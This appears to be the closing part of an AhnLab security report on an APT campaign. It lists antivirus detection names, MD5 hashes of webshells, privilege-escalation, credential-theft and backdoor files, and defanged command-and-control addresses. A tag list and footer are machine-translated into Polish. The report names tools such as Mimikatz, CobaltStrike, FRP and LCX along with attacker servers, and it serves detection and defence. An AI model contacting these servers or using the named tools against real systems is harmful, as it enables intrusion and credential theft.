Malware/Win64.Generic.C3164061 (2019.04.20.01)

Malware/Win64.Generic.C3628819 (2019.12.11.01)

Exploit/Win.Agent.C4448815 (2021.05.03.03)

Trojan/Win.Generic.C4963786 (2022.02.11.04)

Trojan/Win.Exploit.C4997833 (2022.03.08.01)

Exploit/Win.Agent.C5224192 (2022.08.17.00)

Exploit/Win.Agent.C5224193 (2022.08.17.00)

Trojan/Win32.RL_Mimikatz.R290617(2019.09.09.01)

Trojan/Win32.Mimikatz.R262842(2019.04.06.00)

Trojan/Win.Swrort.R450012(2021.11.14.01)

HackTool/Win.Lsassdump.R524859(2022.10.05.00)

HackTool/Win.ProxyVenom.C5280699(2022.10.15.01)

Unwanted/Win.Frpc.C5222534 (2022.08.13.01)

Unwanted/Win.Frpc.C5218508 (2022.08.03.03)

Unwanted/Win.Frpc.C5218510 (2022.08.03.03)

Unwanted/Win.Frpc.C5218513 (2022.08.03.03)

HackTool/Win.Frpc.5222544 (2022.08.13.01)

HackTool/Win.Frp.C4959080 (2022.02.08.02)

HackTool/Win.Frp.C5224195 (2022.08.17.00)

Unwanted/Win.Frpc.C5162558 (2022.07.26.03)

Malware/Win.Generic.C5173495 (2022.06.18.00)

HackTool/Win.LCX.C5192157 (2022.07.04.02)

HackTool/Win.LCX.R432995(2023.01.06.01)

HackTool/Win.Rsocx.C5280341(2022.10.15.00)

Backdoor/Win.BlueShell.C5272202(2022.10.05.00)

Trojan/Win.BlueShell.C5280704(2022.10.15.01)

Backdoor/Win.CobaltStrike.R360995(2022.09.20.00)

Unwanted/Win.Extractor.C5266516(2022.10.01.00)

Trojan/Win.RemCom.R237878(2023.01.07.00)

[IOC]


MD5 (정상 파일 제외)

– 웹쉘

0359a857a22c8e93bc43caea07d07e23

85a6e4448f4e5be1aa135861a2c35d35

4fc81fd5ac488b677a4c0ce5c272ffe3

c0452b18695644134a1e38af0e974172

6b4c7ea91d5696369dd0a848586f0b28

96b23ff19a945fad77dd4dd6d166faaa

88bef25e4958d0a198a2cc0d921e4384

c908340bf152b96dc0f270eb6d39437f

2c3de1cefe5cd2a5315a9c9970277bd7

e5b626c4b172065005d04205b026e446

27ec6fb6739c4886b3c9e21b6b9041b6

612585fa3ada349a02bc97d4c60de784

21c7b2e6e0fb603c5fdd33781ac84b8f

c44457653b2c69933e04734fe31ff699

e31b7d841b1865e11eab056e70416f1a

69c7d9025fa3841c4cd69db1353179cf

fca13226da57b33f95bf3faad1004ee0

af002abd289296572d8afadfca809294

e981219f6ba673e977c5c1771f86b189

f978d05f1ebeb5df334f395d58a7e108

e3af60f483774014c43a7617c44d05e7

c802dd3d8732d9834c5a558e9d39ed37

07191f554ed5d9025bc85ee1bf51f975

61a687b0bea0ef97224c7bd2df118b87

…(생략)


– 권한 상승

9fe61c9538f2df492dff1aab0f90579f

ab9091f25a5ad44bef898588764f1990

87e5c9f3127f29465ae04b9160756c62

ab9091f25a5ad44bef898588764f1990


4bafbdca775375283a90f47952e182d9

0311ee1452a19b97e626d24751375652

acacf51ceef8943f0ee40fc181b6f1fa

3cbea05bf7a1affb821e379b1966d89c

10f4a1df9c3f1388f9c74eb4cdf24e7c

b5bdf2de230722e1fe63d88d8f628ebc

edb685194f2fcd6a92f6e909dee7a237

e9bd5ed33a573bd5d9c4e071567808e5

fbae6c3769ed4ae4eccaff76af7e7dfe


937435bbcbc3670430bb762c56c7b329

fd0f73dd80d15626602c08b90529d9fd

29274ca90e6dcf5ae4762739fcbadf01

784becfb944dec42cccf75c8cf2b97e3

7307c6900952d4ef385231179c0a05e4

bcfca13c801608a82a0924f787a19e1d


75fe1b6536e94aaee132c8d022e14f85


d6cb8b66f7a9f3b26b4a98acb2f9d0c5


323a36c23e61c6b37f28abfd5b7e5dfe

7b40aa57e1c61ecd6db2a1c18e08b0af

3665d512be2e9d31fc931912d5c6900e


– 네트워크 스캔

1aca4310315d79e70168f15930cc3308


5e0845a9f08c1cfc7966824758b6953a

9b0e4652a0317e6e4da66f29a74b5ad7

d8d36f17b50c8a37c2201fbb0672200a

b998a39b31ad9b409d68dcb74ac6d97d

d5054ed83e63f911be46b3ff8af82267

e7b7bf4c2ed49575bedabdce2385c8d5


f01a9a2d1e31332ed36c1a4d2839f412


d4d8c9be9a4a6499d254e845c6835f5f


– FRP

4eb5eb52061cc8cf06e28e7eb20cd055

0cc22fd05a3e771b09b584db0a161363

8de8dfcb99621b21bf66a3ef2fcd8138

df8f2dc27cbbd10d944210b19f97dafd

2866f3c8dfd5698e7c58d166a5857e1e

cbee2fd458ff686a4cd2dde42306bba1

3dc8b64b498220612a43d36049f055ab

31c4a3f16baa5e0437fdd4603987b812

b33a27bfbe7677df4a465dfa9795ff4a

7d9c233b8c9e3f0ea290d2b84593c842

c4f18576fd1177ba1ef54e884cb7a79d

5d33609af27ea092f80aff1af6ddf98d

622f060fce624bdca9a427c3edec1663

1f2432ec77b750aa3e3f72c866584dc3

d331602d190c0963ec83e46f5a5cd54a

21d268341884c4fc62b5af7a3b433d90

– FRP_INI

6a20945ae9f7c9e1a28015e40758bb4f

a29f39713ce6a92e642d14374e7203f0

7ce988f1b593e96206a1ef57eb1bec8a

fc9abba1f212db8eeac7734056b81a6e

9f55b31c66a01953c17eea6ace66f636

33129e959221bf9d5211710747fddabe

48b99c2f0441f5a4794afb4f89610e48

28e026b9550e4eb37435013425abfa38

2ceabffe2d40714e5535212d46d78119

c72750485db39d0c04469cd6b100a595

68403cc3a6fcbeb9e5e9f7263d04c02f

52ff6e3e942ac8ee012dcde89e7a1116

d82481e9bc50d9d9aeb9d56072bf3cfe

22381941763862631070e043d4dd0dc2

6b5bccf615bf634b0e55a86a9c24c902

942d949a28b2921fb980e2d659e6ef75

059d98dcb83be037cd9829d31c096dab

cca50cdd843aa824e5eef5f05e74f4a5

f6f0d44aa5e3d83bb1ac777c9cea7060

0ca345bc074fa2ef7a2797b875b6cd4d

f6da8dc4e1226aa2d0dabc32acd06915

0bbfaea19c8d1444ae282ff5911a527b

– LCX

a69d3580921ec8adce64c9b38ac3653a

c4e39c1fc0e1b165319fa533a9795c44

fb6bf74c6c1f2482e914816d6e97ce09

678dbe60e15d913fb363c8722bde313d

– 프록시 ETC

e0f4afe374d75608d604fbf108eac64f

f5271a6d909091527ed9f30eafa0ded6

ae8acf66bfe3a44148964048b826d005

– 측면이동

6983f7001de10f4d19fc2d794c3eb534

fcb7f7dab6d401a17bd436fc12a84623

– 정보 수집 및 자격 증명 탈취

bb8bdb3e8c92e97e2f63626bc3b254c4

80f421c5fd5b28fc05b485de4f7896a1

a03b57cc0103316e974bbb0f159f78f6

46f366e3ee36c05ab5a7a319319f7c72

7bd775395b821e158a6961c573e6fd43

b434df66d0dd15c2f5e5b2975f2cfbe2

c17cfe533f8ce24f0e41bd7e14a35e5e


– 백도어

011cedd9932207ee5539895e2a1ed60a

bc744a4bf1c158dba37276bf7db50d85

23c0500a69b71d5942585bb87559fe83

53271b2ab6c327a68e78a7c0bf9f4044

c87ac56d434195c527d3358e12e2b2e0

C2 및 URL (악용된 국내 기업 서버의 경우 표기 안함)

– Download C2

91.217.139[.]117


– Upload C2

205.185.122[.]95

91.217.139[.]117


– FRP & LCX C2

hxxp://sk1.m00nlight[.]top:80 (45.136.186.19) //MOACK_Co_LTD 업체 서버

hxxps://fk.m00nlight[.]top:443 (45.136.186.175:443) //MOACK_Co_LTD 업체 서버

hxxps://aa.zxcss[.]com:443 (45.93.31.122) //MOACK_Co_LTD 업체 서버

45.93.31[.]75:7777 //MOACK_Co_LTD 업체 서버

45.93.28[.]103:8080 //MOACK_Co_LTD 업체 서버

103.118.42[.]208

101.43.121[.]50


– Backdoor C2

45.93.31[.]75 //MOACK_Co_LTD 업체 서버

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.



CATEGORIES:악성코드 정보


TAGGED AS:ANTSWORD,APT,ASPXSPY,BADPOTATO,BITLOCKER,BITSADMIN,BLUESHELL,CERTUTIL,CHOPPER,COBALTSTRIKE,CONF.ASPX,CVE-2017-10271,CVE-2018-8639,CVE-2019-1458,DALBIT,DUHGGHMPERT.DMP,DUMPERT,달빗,EFSPOTATO,FF0.123456,FRP,FSCAN,GODZILLA,GOTOHTTP, HTRAN , ZŁOŚLIWE OPROGRAMOWANIE , KAMPANIA , JUICYPOTATO , LADON , LCX , M00NLIGHT , GŁÓWNY , MIMIKATZ , NPS , NTLTEST , PROCDUMP , RDP , REGEORG , ROTTENPOTATO , RSYNC , SWEETPOTATO , WEBLOGIC , XP_CMDSHELL


Wznowienie krajowej dystrybucji Magniber Ransomware (1/28)Cotygodniowe statystyki ASEC dotyczące złośliwego systemu (20230123 ~ 20230129)

5

ocena w skali gwiazdkowej

Zaloguj sie

Gość

Bądź pierwszy który skomentuje!

0 KOMENTARZY

Szukaj...

SZAFKA

SZAFKA

Wybierz miesiąc

OTRZYMYWAĆ WIADOMOŚCI

Facebook

Świergot

kanał RSS

220 Pangyoyeok-ro, Bundang-gu, Seongnam-si, Gyeonggi-do, 13493 | CEO: Kang Seok-kyun | Numer rejestracyjny firmy: 214-81-83536 | Polityka prywatności

© AhnLab, Inc. Wszelkie prawa zastrzeżone.


Witryna rodzinna

Korea (koreański)


Idź do oryginalnego materiału